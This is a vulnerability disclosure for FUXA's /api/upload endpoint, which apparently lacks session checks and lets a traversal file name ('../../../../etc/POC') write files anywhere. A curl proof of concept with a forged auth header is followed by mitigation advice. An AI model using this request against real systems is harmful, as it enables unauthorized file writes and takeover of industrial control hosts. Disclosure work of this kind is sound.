# Description
While reviewing FUXA, research found it is possible to upload arbitrary files into arbitrary locations via the “/api/upload” endpoint.
Even when authentication in enabled, it was found this endpoint does not validate a user’s session. In addition, the function behind this endpoint writes uploaded files to arbitrary locations via a path traversal vulnerability. When a request is sent, the request contains a “name” parameter, and a “data” parameter. The file name supplied in the “name” parameter is never sanitized meaning it is possible to write files outside of the intended upload folder.
The cURL command below will upload a file named “POC” to the “/etc/” directory. The file will contain the string “PROOF OF CONCEPT.”
# Proof of Concept
“`
curl -i -s -k -X $’POST’
-H $’Host: localhost:1881′ -H $’User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0′ -H $’Accept: application/json, text/plain, */*’ -H $’Accept-Language: en-US,en;q=0.5′ -H $’Accept-Encoding: gzip, deflate’ -H $’Referer: https://localhost:1881/editor’ -H $’Content-Type: application/json’ -H $’x-auth-user: {“user”:”notvalid”,”groups”:99999999}’ -H $’x-access-token: ‘ -H $’Content-Length: 76′ -H $’Origin: https://localhost:1881′ -H $’Connection: close’ -H $’Pragma: no-cache’ -H $’Cache-Control: no-cache’
-b $’io=’
–data-binary $'{“name”:”../../../../../../../../etc/POC”,”data”:”UFJPT0YgT0YgQ09OQ0VQVA==”}’
$’https://localhost:1881/api/upload’
“`
To mitigate this vulnerability this endpoint should be limited to authenticated users, and remove any dangers characters such as “../” from the file name. Additionally, as the intended file media location is known, the function should verify that the final file location is within the upload directory. Any files outside this directory should not be uploaded.